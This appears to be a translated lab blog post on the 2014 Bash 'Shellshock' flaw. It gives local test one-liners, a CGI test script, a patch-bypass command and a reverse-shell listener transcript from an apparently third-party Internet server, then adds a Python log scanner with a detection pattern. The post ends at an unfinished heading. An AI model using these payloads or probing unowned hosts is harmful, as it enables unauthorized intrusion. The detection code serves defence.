Source: Mickey@360 Network Attack and Defense Lab
Stephane Chazelas recently discovered a bug in BASH. The problem lies in how BASH handles environment variables. This vulnerability affects bash versions 1.14 - 4.3,
and the affected distributions include:
Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
CentOS (versions 5 through 7)
Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
Debian
Local test method:
# On an unpatched bash the function-definition value is parsed and the trailing command runs,
# so "vulnerable" is printed before "this is a test".
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
Above is my test result on Kali.
Remote test method:
First, write a CGI script in BASH
root@kali:/usr/lib/cgi-bin# cat bug.sh
#!/bin/bash
# Minimal HTTP response: header, blank line, then the body
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
# Dump the CGI environment (the request headers arrive here as HTTP_* variables)
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
Put it in /usr/lib/cgi-bin, then access it with curl
It prints the environment variables, which shows the CGI is reachable. Next, let's get a reverse shell
Visit it and see the result
Further tests are still in progress.
Note: the Android version of bash is also affected
Reference documents:
https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
Real-world Internet test example:
root@kali:~# nc -vvlp 8080
listening on [any] 8080 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41997
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),50001(gforge),50002(stats),50003(news),50006(tmp)
$ exit
sent 8, rcvd 161
Successfully exploited one, and surprisingly it is a Perl script, so CGI execution in general is affected. Thought: could it be because of what the #! line means, startup... startup... ^_^
sh-4.1$ head moon.cgi
head moon.cgi
#!/usr/bin/perl
#
# moon.cgi
# Display a Moon image using the skycalc program
# by John Thorstensen and images generated by mp.
#
# Brian Casey
# Imagiware, Inc.
The Perl CGI on my own machine could not be exploited; I guess it is related to the web server. Alas, I still don't know enough.
The foreign article mentions the conditions:
Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string)
ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.
Any other application which is hooked onto a shell or runs a shell script as using bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.
That moon.cgi Perl script presumably called open/exec or similar, forking bash
Also, the patch that was released apparently can be bypassed too; see here
https://twitter.com/taviso/status/514887394294652929
Exploitation:
# On an unpatched bash the stray '>\' redirection left behind by the broken function definition
# is applied to the next command, so `date` runs and its output lands in a file named `echo`.
env lol='() { (nothing)=>\' sh -c "echo date" ; echo "vulnerable"
The SSH exploitation the foreigners mention requires an account; it is more about bypassing restrictions. Reference
https://about.gitlab.com/2014/09/24/gitlab-shell-and-bash-cve-2014-6271/
Snort protection rules from abroad
http://www.volexity.com/blog/?p=19
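As an added defender-side example (not from this post or the Snort rules linked above), the check below scans Apache combined-format log lines for the "() {" function-definition prefix that both test strings on this page begin with; the log lines and hosts are constructed samples, and it only sees the fields the combined format records (request line, Referer, User-Agent), not Cookie or Host.

```python
import re
from typing import Dict, List, Optional

# Shellshock trigger signature: a value that starts a bash function definition "() {".
# It also matches the CVE-2014-7169 variant "() { (a)=>\" because both begin the same way;
# bash tolerates whitespace inside the parentheses and before the brace, so the pattern does too.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# A quoted Apache log field: non-quote characters or backslash-escaped ones (Apache logs " as \").
_Q = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>' + _Q + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + _Q + r')" "(?P<agent>' + _Q + r')"$'
)

# These fields reach a CGI as REQUEST_URI/QUERY_STRING, HTTP_REFERER and HTTP_USER_AGENT.
INSPECTED_FIELDS = ("request", "referer", "agent")

# Constructed sample lines (not real traffic); the two payloads are the test strings quoted on
# this page, written the way Apache would log them (the trailing backslash is escaped as \\).
LOG_LINES = [
    '203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/bug.sh HTTP/1.1" 200 512 "-" "curl/7.38.0"',
    '198.51.100.7 - - [25/Sep/2014:10:12:09 +0000] "GET /cgi-bin/bug.sh HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"',
    '198.51.100.7 - - [25/Sep/2014:10:12:15 +0000] "GET /cgi-bin/moon.cgi HTTP/1.1" 500 0 "() { (nothing)=>\\\\" "Mozilla/5.0"',
    '192.0.2.9 - - [25/Sep/2014:10:13:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux)"',
]


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or return None if it is malformed."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one alert per inspected field whose value carries the '() {' signature."""
    alerts = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # malformed lines are skipped, never silently treated as clean
        for field in INSPECTED_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                alerts.append({"host": rec["host"], "time": rec["time"],
                               "field": field, "value": rec[field]})
    return alerts


if __name__ == "__main__":
    for a in scan_log(LOG_LINES):
        print(f"{a['time']} {a['host']} {a['field']}: {a['value']}")
```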
Another real-world Internet reverse shell example: